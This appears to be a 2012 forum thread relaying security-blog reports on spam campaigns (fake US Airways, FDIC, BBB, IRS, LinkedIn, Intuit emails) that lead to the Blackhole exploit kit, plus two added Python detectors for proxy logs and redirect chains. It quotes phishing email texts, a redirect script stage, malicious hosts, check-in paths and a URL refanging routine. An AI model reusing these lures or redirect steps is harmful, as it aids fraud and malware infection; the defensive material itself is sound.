Last Updated September 18, 2012
:mad::mad:
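The posts above (the Websense ADP/voice-mail write-up and the dynamoo FedEx, Intuit and IRS posts) keep pointing at the same URL shapes: a "/main.php?page=" landing page with a 16-character hex value, "/links/<name>.php" redirectors, an ":8080/mx/5/B/in" check-in, and a small set of recurring hosts such as 203.91.113.6, with the advice "Block 'em if you can." The block below is an added example of turning those observations into a proxy-log check; it is not code from Websense, Webroot, dynamoo or the forum poster. The log format and the sample lines are constructed, and the host list is a partial copy of indicators given in the posts with the defanging spaces removed.

```python
"""Flag proxy-log requests that match the exploit-kit URL patterns and the
hosts listed in the posts above. Added example, not from any of the quoted
blogs. Log format, sample lines and the (partial) host list are constructed
for the example from values that appear in the posts."""
import re
from urllib.parse import urlsplit

# Hosts named in the posts above (defanging spaces removed). Partial list.
KNOWN_BAD_HOSTS = {
    "203.91.113.6", "108.178.59.26", "96.47.0.163", "108.60.141.7",
    "173.255.221.74", "87.120.41.155", "gsigallery.net", "dushare.net",
    "kerneloffce.ru", "virtual-geocaching.net", "thebummwrap.net",
    "blue-lotusgrove.net",
}
# Blackhole landing page: /main.php?page=<16 hex chars>
LANDING_PATH = re.compile(r"/main\.php$")
LANDING_QUERY = re.compile(r"page=[0-9a-f]{16}$")
# Redirector style seen in the ADP and "Photos" campaigns: /links/<name>.php
# (also /forum/links/column.php). Broad pattern, so low confidence on its own.
LINKS_PATH = re.compile(r"(^|/)links/[A-Za-z0-9_-]+\.php$")
# Check-in path the dropped Cridex samples beaconed to on port 8080.
C2_PATH = re.compile(r"^/mx/?5/B/in/?$")


def classify(url):
    """Return the list of reasons a URL looks like part of these campaigns
    (empty list if none match). All matching reasons are returned so an
    analyst sees both 'known host' and 'pattern' when they coincide."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host.startswith("www."):
        host = host[4:]
    reasons = []
    if host in KNOWN_BAD_HOSTS:
        reasons.append("known-bad-host")
    if LANDING_PATH.search(parts.path) and LANDING_QUERY.fullmatch(parts.query):
        reasons.append("blackhole-landing")
    if parts.port == 8080 and C2_PATH.match(parts.path):
        reasons.append("c2-checkin")
    if LINKS_PATH.search(parts.path):
        reasons.append("links-redirector")
    return reasons


# Constructed proxy log: timestamp, client IP, method, URL, status.
# URLs are ones quoted in the posts above plus two benign controls.
SAMPLE_LOG = """\
2012-09-14T10:01:02 10.0.0.12 GET http://www.example.com/index.html 200
2012-09-14T10:01:05 10.0.0.12 GET http://studiomonahan.net/main.php?page=2bfd5695763b6536 200
2012-09-14T10:01:09 10.0.0.12 GET http://46.249.37.122/links/systems-links_warns.php 404
2012-09-14T10:02:40 10.0.0.12 POST http://87.120.41.155:8080/mx/5/B/in 200
2012-09-14T10:03:00 10.0.0.31 GET http://203.91.113.6/ 200
2012-09-14T10:03:10 10.0.0.31 GET http://www.example.org/main.php?page=notahexstring 200
"""


def scan_log(text):
    """Return (line_no, client_ip, url, reasons) for every line that matches.
    Malformed lines (fewer than four fields) are skipped, not raised on."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 4:
            continue
        client, url = fields[1], fields[3]
        reasons = classify(url)
        if reasons:
            hits.append((number, client, url, reasons))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```

Running it on the sample log flags lines 2 to 5 and leaves the two benign requests alone; note that the 404 on the /links/ redirector (dynamoo's own observation) still counts as a hit, because the client that asked for it has already followed the lure and is worth a look regardless of what the server answered.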
AplusWebMaster
2012-09-18, 23:10
FYI...
Fake US Airways emails serve exploits and malware ...
- http://blog.webroot.com/2012/09/18/spamvertised-us-airways-reservation-confirmation-themed-emails-serve-exploits-and-malware/
Sep 18, 2012 - "Cybercriminals are currently spamvertising millions of emails impersonating U.S. Airways, in an attempt to trick users into clicking on the malicious links found in the legitimate-looking emails...
Sample screenshot of the spamvertised US Airways themed email:
> https://webrootblog.files.wordpress.com/2012/09/us_airways_spam_email_malware_exploits_black_hole_explot_kit.png
Sample client-side exploits served: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1885 - 9.3 (HIGH)
Responding to the same IP 203.91.113.6 (AS24559) ...
Detection rate for a sample JavaScript redirection: MD5: 5c5a3c6e91c1c948c735e90009886e37 *
... Mal/Iframe-W
Upon successful client-side exploitation, the campaign drops MD5: 9069210d0758b34d8ef8679f712b48aa **
... Trojan.Winlock.6049; W32/Cridex.R
Upon execution, the sample phones back to 199.71.213.194 :8080/mx/5/B/in/ (AS40676).
More MD5s are known to have phoned back to the same IP..."
* https://www.virustotal.com/file/08cb0d727f12e9dd77d18559a65a03c020c3c9c336457a51161d192cc91cfd6d/analysis/1347403787/
File name: Airways.html
Detection ratio: 3/42
Analysis date: 2012-09-11
** https://www.virustotal.com/file/c6c83420c4c2a64bd03463b6afd36b218aa6edb936c4ac15b9367669c354b59a/analysis/
File name: readme.exe
Detection ratio: 6/42
Analysis date: 2012-09-14
:mad:
AplusWebMaster
2012-09-19, 20:39
FYI...
Malicious UPS/FedEx emails re: iPhone 5 orders ...
- http://community.websense.com/blogs/securitylabs/archive/2012/09/18/watch-out-for-malicious-ups-fedex-notifications-when-waiting-for-iphone-5.aspx
18 Sep 2012 - "The first batch of iPhone 5s will be delivered on Friday of this week... From reading discussion forums online... all orders from Apple's online store will ship with UPS... when I received a UPS notification email today, I obviously expected it to be about my iPhone. Turns out, it wasn't.
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/3288.ups_5F00_notification_5F00_1.png
... the email contained an attached HTML page that, when loaded, displayed the page below:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/3704.ups_5F00_notification_5F00_browser.png
... the risk is great that recipients will have their guards down and will run the attached file... There's a hidden, obfuscated script on the page... it loads an iframe from a .RU domain, which is a Blackhole Exploit Kit site that pushes a banking trojan to the PC... the phrase used for the .RU domain name translates to "money on account". Banking trojan, money on account... be extra careful if you're waiting for a delivery notification, and don't run any attachments contained in those types of emails."
___
(More) Fake UPS e-mail messages ...
> http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=25171
Sep 19, 2012
:mad:
AplusWebMaster
2012-09-19, 23:28
FYI...
Fake FDIC emails serve client-side exploits and malware
- http://blog.webroot.com/2012/09/19/cybercriminals-impersonate-fdic-serve-client-side-exploits-and-malware/
Sep 19, 2012 - "... cybercriminals started spamvertising millions of emails impersonating the Federal Deposit Insurance Corporation (FDIC), in an attempt to trick businesses into installing a bogus and non-existent security tool promoted in the emails. Upon clicking on the links, users are exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised FDIC impersonating email:
> https://webrootblog.files.wordpress.com/2012/09/fdic_spam_email_malware_exploits_black_hole_exploit_kit.png
Once the user clicks on the malicious link, he’s exposed to the following bogus “Page loading…” page:
> https://webrootblog.files.wordpress.com/2012/09/fdic_spam_email_malware_exploits_black_hole_exploit_kit_01.png
Client-side exploits serving URL: hxxp ://afgreenwich .net/main.php?page=0f123fe645ddf8d7 - 203.91.113.6 (AS24559)...
Upon successful client-side exploitation, the campaign drops MD5: 3ce1ae2605aa800c205ef63a45ffdbfa *
... Trojan-Ransom.Win32.Gimemo.aovu; W32.Cridex
Once executed, it attempts to phone back to 72.167.253.106 :8080/mx/5/B/in (AS26496)...
More MD5s are known to have phoned back to the same IP in the past, for instance:
MD5: 97974153c25baf5826bf441a8ab187a6 **
...Trojan.Win32.Jorik.Zbot.fxq; Gen:Variant.Zusy.17989
... and MD5: 9069210d0758b34d8ef8679f712b48aa ***
... Trojan.Winlock.6049; W32/Cridex.R ..."
* https://www.virustotal.com/file/87742fa4d67a5d142e77dbeda2cc02bd2a975bf543ea0505045b096a82068c93/analysis/
File name: b9126f7be02c682d7b1b534c928881a0aba6ae0c
Detection ratio: 25/42
Analysis date: 2012-09-16
** https://www.virustotal.com/file/4b9a4956f8c4970f1029f814f4ad97b19bb051e186318795e482d20650fa325b/analysis/
File name: test73608696665548.bin
Detection ratio: 16/42
Analysis date: 2012-09-13
*** https://www.virustotal.com/file/c6c83420c4c2a64bd03463b6afd36b218aa6edb936c4ac15b9367669c354b59a/analysis/
File name: readme.exe
Detection ratio: 6/42
Analysis date: 2012-09-14
___
New Malware Sites using Blackhole Exploit Kit v2.0
- https://blog.opendns.com/2012/09/18/new-malware-sites-using-blackhole-exploit-kit-v2-0/
Sep 18, 2012
:mad: :mad:
AplusWebMaster
2012-09-23, 14:32
FYI...
LinkedIn SPAM / 69.194.201.21
- http://blog.dynamoo.com/2012/09/linkedin-spam-6919420121.html
22 Sep 2012 - "This fake LinkedIn spam leads to malware on 69.194.201.21:
Date: Sat, 22 Sep 2012 15:16:47 -0500
From: "Reminder" [CC8504C0E@updownstudio.com]
Subject: LinkedIn: New messages awaiting your response
LinkedIn
REMINDERS
Invitation reminders:
From Emilio Byrd (Insurance Manager at Wolseley)
PENDING MESSAGES
There are a total of 88 message(-s) awaiting your response. Go to InBox now.
This message was sent to [redacted]. This is an occasional email to help you get the most out of LinkedIn.
Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user without your permission.
2012, LinkedIn Corporation.
The malicious payload is at [donotclick]69.194.201.21 /links/deep_recover-result.php (Solar VPS, US) which appears to be a Blackhole 2 exploit kit. Blocking this IP address would be prudent."
___
Fake 'KLM e-Ticket' attempts to install backdoor
- http://community.websense.com/blogs/securitylabs/archive/2012/09/21/fake-klm-e-ticket-attempts-to-install-backdoor.aspx
21 Sep 2012 - "... malicious zipped attachment..."
___
New Malware Sites using Blackhole Exploit Kit v2.0
- https://blog.opendns.com/2012/09/18/new-malware-sites-using-blackhole-exploit-kit-v2-0/
Sep 18, 2012
:fear: :mad:
AplusWebMaster
2012-09-25, 00:17
FYI...
BBB malicious SPAM flood
- http://community.websense.com/blogs/securitylabs/archive/2012/09/24/bbb-malicious-spam-flood.aspx
24 Sep 2012 - "... another barrage of malicious BBB (Better Business Bureau) complaint notifications... Websense.. has detected and intercepted a marked increase in BBB malicious email this month... In an attempt to look authentic, the messages include an official graphic from the BBB Web site but, as is often the case with malicious email campaigns, they also include suspicious grammar: "about your company possible involvement in check cashing and Money Order Scam."
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/3288.BBB_2D00_Image1.png
... a number of different subjects have been utilized for this campaign, presumably in an attempt to thwart detection, including random "Complaint IDs"...
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Components.ImageFileViewer/CommunityServer.Blogs.Components.WeblogFiles.securitylabs/3276.BBB_2D00_Image2.png_2D00_550x0.png
... As with other similar malicious campaigns with themes relating to ADP, Twitter, and LinkedIn, the techniques, tools and redirection path that are used are pretty much the same. Tools like the Cutwail spambot and Blackhole exploit kit seem to be the main weapons used by cybercriminals in malicious spam nowadays. Redirection paths:
1) hxxp ://vargasvilcolombia .com/PykKDZe/index.html
2) <html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp ://pst.org .br/Wi4aFSLZ/js.js"></script>
<script type="text/javascript" src="hxxp ://www.adahali .com/NQ9Ba2ap/js.js"></script>
</html>
3) document.location='hxxp ://108.178.59.11 /links/deep_recover-result.php';
As is very common these days, the payload for this particular campaign is the recently updated BlackHole Exploit Kit v 2.0..."
___
BBB Spam / 108.178.59.11
- http://blog.dynamoo.com/2012/09/bbb-spam-1081785911.html
24 Sep 2012 - "... most likely a Blackhole 2 kit. This IP address has been used in other attacks and should be blocked if you can."
- http://centralops.net/co/DomainDossier.aspx
108.178.59.11
network:State: Italy
OriginAS: AS32475
- http://google.com/safebrowsing/diagnostic?site=AS:32475
"... over the past 90 days, 2949 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-09-24, and the last time suspicious content was found was on 2012-09-24... we found 149 site(s)... that appeared to function as intermediaries for the infection of 375 other site(s)... We found 141 site(s)... that infected 838 other site(s)..."
:mad:
AplusWebMaster
2012-09-25, 20:09
FYI...
Twitter DMs from "friends" lead to backdoor Trojan
- http://nakedsecurity.sophos.com/2012/09/24/twitter-facebook-video-malware/
Sep 24, 2012 - "Have you received a Twitter message from an online friend, suggesting you have been captured in a Facebook video?... The aim of the messages? To trick the unwary into clicking on a link... and ultimately infect computers. Here is one example:
> https://sophosnews.files.wordpress.com/2012/09/twitter-hacked.jpg?w=640
... here's another. Note that there are many different combinations of wording that can be used.
> https://sophosnews.files.wordpress.com/2012/09/twitter-hacked-2.jpg?w=640
Users who click on the link are greeted with what appears to be a video player and a warning message that "An update to Youtube player is needed". The webpage continues to claim that it will install an update to Flash Player 10.1 onto your computer.
> https://sophosnews.files.wordpress.com/2012/09/video-malware.jpg?w=640
... In this example, the program you are being invited to download is called FlashPlayerV10.1.57.108.exe, and is detected by Sophos anti-virus products as Troj/Mdrop-EML, a backdoor Trojan that can also copy itself to accessible drives and network shares. Quite how users' Twitter accounts became compromised to send the malicious DMs in the first place isn't currently clear, but the attack underlines the importance of -not- automatically clicking on a link just because it appeared to be sent to you by a trusted friend. If you do find that it was your Twitter account sending out the messages, the sensible course of action is to assume the worst, change your password (make sure it is something unique, hard-to-guess and hard-to-crack) and revoke permissions of any suspicious applications that have access to your account."
:mad:
AplusWebMaster
2012-09-25, 23:33
FYI...
Evil network: 108.178.59.0/26
- http://blog.dynamoo.com/2012/09/evil-network-10817859026.html
25 Sep 2012 - "There's quite a bit of malware coming from a range of Singlehop IPs over the past few days. The range is 108.178.59.0/26 (108.178.59.0 - 108.178.59.63)
So far, I've seen blackhole samples from 108.178.59.20, 108.178.59.11 and 108.178.59.26 which is enough to convince me that the whole /26 is bad and should be blocked.
Singlehop have reallocated the IP range to a customer:
network: IP-Network: 108.178.59.0/26
network: State: Italy
network: Country-Code: IT ...
It's quite possible that Mr Coco doesn't know that the IP range is being abused in this way, but blocking access to it would be prudent..."
- http://centralops.net/co/DomainDossier.aspx
network: IP-Network: 108.178.59.0/26
network: State:Italy
network: Country-Code: IT
___
BBB SPAM / one.1000houses .biz
- http://blog.dynamoo.com/2012/09/bbb-spam-one1000housesbiz.html
25 Sep 2012 - "This fake BBB spam leads to malware at one.1000houses .biz:
Date: Tue, 25 Sep 2012 11:42:18 +0200
From: "Better.Business Bureau" [8050910@zread.com]
Subject: Activity Report
Dear business owner, we have received a complaint about your company possible involvement in check cashing and Money Order Scam.
You are asked to provide response to this complaint within 7 days.
Failure to provide the necessary information will result in downgrading your Better Business Bureau rating and possible cancellation of your BBB accreditation status.
Complaint ID#125368
Council of Better Business Bureaus
3033 Wilson Blvd, Suite 600
Arlington, VA 22201
Phone: 1 (703) 276.0100
Fax: 1 (703) 525.8277
The malicious payload is at [donotclick]one.1000houses .biz/links/deep_recover-result.php hosted on 199.195.116.185 (A2 Hosting, US). The domain 1000houses .biz appears to be a legitimate domain where the GoDaddy account has been hacked to serve malware on subdomains. There seems to be a long-standing issue with GoDaddy domains being used in this way.
Blocking 199.195.116.185 would probably be prudent..."
:mad: :mad:
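The three-hop redirection path quoted in the Websense BBB write-up above (spam link, "WAIT PLEASE" page with external js.js includes, document.location to the Blackhole 2 landing page) and the ranges the dynamoo posts recommend blocking (108.178.59.0/26, 84.22.96.0/19), walked through in an added Python example that is not code from this thread or from any of the quoted blogs. It refangs the reported URLs, pulls the script includes out of the stage-2 page and the redirect target out of the stage-3 script, and flags hops that fall in a blocked range or match a Blackhole landing-page path; the blocklist, the path patterns and the sample pages are constructed from values quoted in this thread, and hostnames are not resolved.

```python
"""Walk a Blackhole-style spam redirection chain and check each hop
against the IP ranges and landing-page paths reported in the thread.
Added example; sample data is constructed from the quoted reports."""
import ipaddress
import re
from urllib.parse import urlparse

# Ranges/hosts the quoted posts recommend blocking.
BLOCKLIST = [
    "108.178.59.0/26",   # Singlehop range serving Blackhole 2 (dynamoo)
    "84.22.96.0/19",     # CyberBunker range (dynamoo, NACHA spam)
    "203.91.113.6/32",   # G Mobile, Mongolia; reused across campaigns
    "69.194.201.21/32",  # Solar VPS; LinkedIn spam payload
]
NETWORKS = [ipaddress.ip_network(n) for n in BLOCKLIST]

# Landing-page paths seen in the thread for Blackhole 1.x and 2.0.
LANDING_PATTERNS = [
    re.compile(r"/main\.php\?page=[0-9a-f]{16}$"),     # Blackhole 1.x
    re.compile(r"/links/deep_recover-result\.php$"),   # Blackhole 2.0
    re.compile(r"/forum/links/column\.php$"),          # Blackhole 2.0 on :8080
    re.compile(r"/(links|detects)/[a-z_-]+\.php$"),    # broader 2.0 form
]


def refang(url):
    """Undo the 'hxxp ://' and 'example .com' defanging used in the reports."""
    url = url.strip()
    url = re.sub(r"^hxxp(s?)\s*://", r"http\1://", url, flags=re.I)
    url = re.sub(r"\s+\.", ".", url)   # 'pst.org .br'        -> 'pst.org.br'
    url = re.sub(r"\s+:", ":", url)    # '108.178.59.11 :8080' -> '...:8080'
    url = re.sub(r"\s+/", "/", url)    # '108.178.59.11 /links' -> '.../links'
    return url


def host_in_blocklist(host):
    """True when host is a literal IP inside one of the blocked ranges."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # hostname: resolving it is deliberately not done here
    return any(addr in net for net in NETWORKS)


def extract_script_srcs(html):
    """Stage 2: the 'WAIT PLEASE / Loading...' page only loads external scripts."""
    return [refang(m) for m in re.findall(r'<script[^>]+src="([^"]+)"', html, re.I)]


def extract_location_redirects(js):
    """Stage 3: js.js sets document.location to the exploit-kit landing page."""
    return [refang(m) for m in re.findall(r"document\.location\s*=\s*'([^']+)'", js)]


def classify(url):
    """Verdicts for one hop: blocked IP range and/or Blackhole landing path."""
    p = urlparse(url)
    path_q = p.path + ("?" + p.query if p.query else "")
    return {
        "url": url,
        "host": p.hostname,
        "blocked_ip": host_in_blocklist(p.hostname or ""),
        "looks_like_landing": any(r.search(path_q) for r in LANDING_PATTERNS),
    }


def walk_chain(stage2_html, stage3_js):
    """Return one verdict dict per hop, in the order the browser would load them."""
    hops = extract_script_srcs(stage2_html) + extract_location_redirects(stage3_js)
    return [classify(u) for u in hops]


# Constructed from the redirection path quoted in the Websense BBB write-up.
STAGE2_HTML = """<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp ://pst.org .br/Wi4aFSLZ/js.js"></script>
<script type="text/javascript" src="hxxp ://www.adahali .com/NQ9Ba2ap/js.js"></script>
</html>"""
STAGE3_JS = "document.location='hxxp ://108.178.59.11 /links/deep_recover-result.php';"

if __name__ == "__main__":
    for hop in walk_chain(STAGE2_HTML, STAGE3_JS):
        tags = [t for t, on in (("BLOCKED-IP", hop["blocked_ip"]),
                                ("BH-LANDING", hop["looks_like_landing"])) if on]
        print(f"{hop['url']:60s} {' '.join(tags) or 'intermediate'}")
```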
AplusWebMaster
2012-09-26, 14:29
FYI...
FTC halts computer spying
* http://www.ftc.gov/opa/2012/09/designware.shtm
09/25/2012
Rent-to-own laptops were spying on users
- http://h-online.com/-1717567
26 Sep 2012 - "The US Federal Trade Commission (FTC) has settled a case with several computer rent-to-own companies and a software maker over their use of a program which spied on as many as 420,000 users of the computers. The terms of the settlement* will ban the companies from using monitoring software, deceiving customers into giving up information or using geo-location to track users. "The FTC orders today will put an end to their cyber spying" said Jon Leibowitz, FTC Chairman. The software for rental companies from DesignerWare included a "Detective Mode", a spyware application that, according to the FTC's complaint, could activate the webcam of a laptop and take pictures and log keystrokes of user activity. The software also regularly presented a fake registration screen designed to trick users into entering personal information. The data from this application was then transmitted to DesignerWare where it was then passed on to the rent-to-own companies... The FTC is limited in its actions, telling Wired**, "We don't have criminal authority. We only have civil authority" and, as this was a first violation of the FTC act, it cannot impose fines on the companies. Instead, the companies will be monitored by the FTC for compliance with the ban on using the software, or, in the case of DesignerWare, licensing it, for the next 20 years..."
** http://www.wired.com/threatlevel/2012/09/laptop-rental-spyware-scandal/
:mad:
AplusWebMaster
2012-09-26, 15:55
FYI...
Spear Phishing Emails increase 56% ...
- http://blog.fireeye.com/research/2012/09/top-20-words-used-in-spear-phishing-emails.html
2012.09.25 - "Despite the many security defenses aimed at protecting email communications, email continues to be a critical vulnerability for enterprises. Between Q1 2012 and Q2 2012 alone, FireEye reported a 56% increase in the amount of malicious emails - and this wasn’t simply an increase in the total number of emails distributed; it was an increase in the number of emails that were able to -bypass- signature and reputation-based security defenses, like next-generation firewalls, intrusion prevention systems (IPS), anti-virus (AV), and secure gateways... In a new report from FireEye*, FireEye researchers analyze the nature of malicious files cybercriminals distribute in order to bypass traditional security defenses and identify several trends - including the most common words in file names and file extensions used in spear phishing attacks. Among these trends, in particular, FireEye researchers found:
• File names relating to shipping grew from 19.20% to 26.35%.
• Number of files referencing words associated with urgency grew from 1.72% to 10.68%.
• Shipping-related words topped the lists of most frequently appearing words in spear phishing emails for both 2H 2011 and 1H 2012.
In the security community, we’re more than familiar with the consequences stemming from these kinds of advanced cyber attacks - GhostNet, Night Dragon, Operation Aurora, and the RSA breach all originated, at least in part, via targeted spear phishing emails. These highly publicized incidents only further indicate what cybercriminals already well know and use to their advantage: email is a mode of attack that works..."
* http://www.fireeye.com/resources/pdfs/fireeye-top-spear-phishing-words.pdf
:mad:
AplusWebMaster
2012-09-26, 23:19
FYI...
IRS SPAM - 3 different versions ...
- http://blog.dynamoo.com/2012/09/irs-spam-1howtobecomeabostoniancom-and.html
26 Sep 2012 - "Three different versions of fake IRS spam today, two leading to malware on 1.howtobecomeabostonian .com and the other with a malicious payload on mortal-records .net.
Date: Wed, 26 Sep 2012 20:44:47 +0530
From: "Internal Revenue Service (IRS)" [58D1F47@guyzzer.com]
To: [redacted]
Subject: Internal Revenue Service: For the attention of enterpreneurs
Internal Revenue Service (IRS)
Hello,
Due to the system error the EIN of your company has been accidently erased from the online database, please validate your EIN to reaffirm your current status of taxpayer. Certain indulgences will be applied to the next audit report for your company. IRS is sorry to cause inconvenience.
For detail information, please refer to:
https ://www.irs .gov/Login.aspx?u=E8710D9E9
Email address: [redacted]
Sincerely yours,
Barry Griffin
IRS Customer Service representative
Update your subscriptions, modify your password or email address, or stop subscriptions at any time on your Subscriber Preferences Page.
You will need to use your email address to log in.
This service is provided to you at no charge by the Internal Revenue Service (IRS).
This email was sent to [redacted] by: Internal Revenue Service (IRS) · Internal Revenue Service · 1111 Constitution Ave. N.W. · Washington DC 20535
==========
Date: Wed, 26 Sep 2012 11:09:45 -0400
From: "Internal Revenue Service (IRS)" [90A75BC@etherplay.com]
To: [redacted]
Subject: Internal Revenue Service: For the attention of enterpreneurs
Internal Revenue Service (IRS)
Dear business owners,
Due to the corrections in the taxation policies that have been recently applied, IRS informs that LLC, C-Corporations and S-Corporations have to validate their EIN in order to reaffirm their actual status. You have 14-day period in order to examine all the changes and make necessary amendments. We are sorry for the inconvenience caused.
For the details please refer to:
https ://www.irs .gov/ClientArea.aspx?u=1CBD0FC829256C
Email address: [redacted]
Sincerely yours,
Damon Abbott
Internal Revenue Service Representative
Update your subscriptions, modify your password or email address, or stop subscriptions at any time on your Subscriber Preferences Page.
You will need to use your email address to log in.
This service is provided to you at no charge by the Internal Revenue Service (IRS).
This email was sent to [redacted] by: Internal Revenue Service (IRS) · Internal Revenue Service · 1111 Constitution Ave. N.W. · Washington DC 20535
==========
Date: Wed, 26 Sep 2012 19:53:28 +0400
From: Internal Revenue Service [weirdpr6@polysto.com]
To: [[redacted]]
Subject: IRS report of not approved tax bank transfer
Your Federal Tax pending transaction (ID: 52007291963155), recently ordered for processing from your checking account was rejected by your Bank.
Rejected Tax transaction
Tax Transaction ID: 52007291963155
Reason ID See details in the report below
State Tax Transaction Report tax_report_52007291963155.doc (Microsoft Word Document)
Internal Revenue Service 9611 Tellus. Av. Augusta 38209 MV
Payload one is at [donotclick]1.howtobecomeabostonian .com/links/marked-alter.php hosted on 74.207.232.13 (Linode, US) which looks like a -hacked- GoDaddy domain. Payload two is at [donotclick]mortal-records .net/detects/processing-successfully.php hosted on 203.91.113.6 (G-Mobile, Mongolia) which is an IP address that has been used a LOT for this type of attack. Blocking those IPs would be ideal..."
:mad:
AplusWebMaster
2012-09-27, 16:14
FYI...
Fake iPhone sales emails/sites ...
- http://blog.webroot.com/2012/09/27/from-russia-with-iphone-selling-affiliate-networks/
Sep 27, 2012 - "... cybercriminals continue introducing new services and goods with questionable quality and sometimes unknown origins on the market, with the idea to entice potential network participants into monetizing the traffic they can deliver through black hat SEO (Search Engine Optimization), malvertising, and spam campaigns... a recently launched affiliate network selling iPhones that primarily targets Russian-speaking customers, and emphasizes the traffic acquisition scheme used by one of the network’s participants... It all starts with a spam campaign offering brand new iPhones for a decent price in an attempt by one of the network participants to acquire traffic which will ultimately convert into sales.
Sample spamvertised email offering cheap and easy-to-obtain iPhones"
> https://webrootblog.files.wordpress.com/2012/09/spam_iphone_russian_affiliate_network.png
... an example of an affiliate network participant targeting English-speaking users, even though the actual web site is targeting Russian-speaking users...
Sample screenshot of the entry page for the iPhone selling affiliate network:
> https://webrootblog.files.wordpress.com/2012/09/iphone_sale_affiliate_network.png
(More samples available at the blog.webroot URL above)...
We advise bargain hunters to avoid clicking on links found in spam emails, avoid entering their credit card details on sites found in spam emails, and to avoid purchasing -any- kind of item promoted in these emails."
:mad:
AplusWebMaster
2012-10-02, 00:55
FYI... multiple entries:
Intuit SPAM - Shipment / art-london .net
- http://blog.dynamoo.com/2012/10/intuit-shipment-spam-art-londonnet.html
1 Oct 2012 - "This terminally confused Intuit / USPS / Amazon-style spam leads to malware...
Date: Mon, 1 Oct 2012 21:31:57 +0430
From: "Intuit Customer Service" [battingiy760@clickz.com]
To: [redacted]
Subject: Intuit Shipment Confirmation
Dear [redacted],
Great News! Your order, ID859560, was shipped today (see info below) and will complete shortly. We hope that you will find that it exceeds your expectations. If you ordered not one products, we may send them in separate boxes (at no additional cost to you) to ensure the fastest possible delivery. We will also provide you with the ability to track your shipments via the information below.
Thank you for your interest.
ORDER DETAILS
Order #: ID859560
Order Date: Sep 25, 2012
Item(s) In Your Order
Shipping Date: October, 1 2012
Shipping Method: USPS Express Mail
Estimated Delivery Date: October, 3 2012 - October 05, 2012
Tracking No.: 5182072894288348304217
Quantity Item
1 Intuit Card Reader Device - Gray
Please be informed that shipping status details may be not available yet online. Check the Website Status link above for details update.
Shipment Information:
We sent your item(s) to the next address:
065 S Paolo Ave, App. 5A
S Maria, FL
Email: [redacted]
Questions about your order? Please visit Customer Service.
Return Policy and Instructions
Privacy | Legal Disclaimer | Contact Us | About
You have received this business note as part of our efforts to fulfill your request and service your account. You may receive more email notifications from us even if you have previously selected out of marketing notifications...
The malicious payload is at [donotclick]art-london .net/detects/stones-instruction_think.php hosted on 195.198.124.60 (Skand Meteorologi och Miljoinstr AB, Sweden), a site which also hosts the presumably malicious domain indice-acores .net. Presumably this IP is a hacked server belonging to some legitimate Swedish organisation, but you should block it nonetheless."
___
Fake Intuit order confirmation
- http://security.intuit.com/alert.php?a=59
10/01/2012 - "... receiving emails with the title "Your Intuit Order Notification."
Below is a copy of the email people are receiving:
> http://security.intuit.com/images/yourintuitorder.jpg
... This is the end of the fake email. Steps to Take Now: Do not click on the link in the email... Delete the email..." etc...
___
Sendspace SPAM / onlinebayunator .ru
- http://blog.dynamoo.com/2012/10/sendspace-spam-onlinebayunatorru.html
1 Oct 2012 - "I haven't seen Sendspace spam before.. but here it is, leading to malware on onlinebayunator .ru:
Date: Mon, 1 Oct 2012 10:40:29 +0300
From: Twitter
To: [redacted]
Subject: You have been sent a file (Filename: [redacted]-9038870.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]-56.pdf, (133.8 KB) waiting to be downloaded at sendspace.(It was sent by CHIQUITA Caldwell).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,
sendspace - The best free file sharing service...
The malicious payload is at [donotclick]onlinebayunator .ru:8080/forum/links/column.php hosted on the same IP address ( 84.22.96.0/19 ) as this attack* earlier today.
* http://blog.dynamoo.com/2012/10/nacha-spam-onlinebayunatorru.html
___
Evolution1 SPAM / 69.194.194.221
- http://blog.dynamoo.com/2012/10/evolution1-spam-69194194221.html
1 Oct 2012 - "I haven't seen this spam before, it leads to malware on 69.194.194.221:
Date: Mon, 01 Oct 2012 15:44:59 +0200
From: "INTUIT" [D6531193@familyhealthplans.com]
Subject: Information regarding Employer Contribution
INTUIT
Attn: Account Holder
You can view the information about all Employer contributions that are due to be made on 2/1/2012 by visiting the following link:
http ://intuithealthemployer .lh1ondemand .com
Please let us know employment alterations on your enrollment spreadsheet within the period of two business days. The foregoing report shows the ACH amount we will withdraw from your bank account for the contributions on the first business day of the month. Please remember, if changes occur, this may affect the ACH amount.
Intuit Health Debit Card Powered by Evolution1 Employer Services..."
The malicious payload is on 69.194.194.221 (Solar VPS, US) ..."
___
NACHA SPAM / onlinebayunator .ru
- http://blog.dynamoo.com/2012/10/nacha-spam-onlinebayunatorru.html
1 Oct 2012 - "This fake NACHA spam leads to malware on onlinebayunator.ru:
Date: Mon, 1 Oct 2012 04:16:46 -0500
From: Bebo Service [service@noreply.bebo.com]
Subject: Fwd: ACH Transfer rejected
The ACH debit transfer, initiated from your bank account, was canceled.
Canceled transaction:
Transfer ID: FE-764029897226US
Transaction Report: View
Valentino Dickey
NACHA - The Electronic Payment Association
f0c34915-3e624bbb...
The malicious payload is at [donotclick]onlinebayunator .ru:8080/forum/links/column.php (probably a Blackhole 2 exploit kit) hosted on the following familiar IPs that should be blocked:
84.22.100.108 (Republic CyberBunker, Antarctica - Amsterdam more likely)
190.10.14.196 (RACSA, Costa Rica)
203.80.16.81 (Myren, Malaysia)
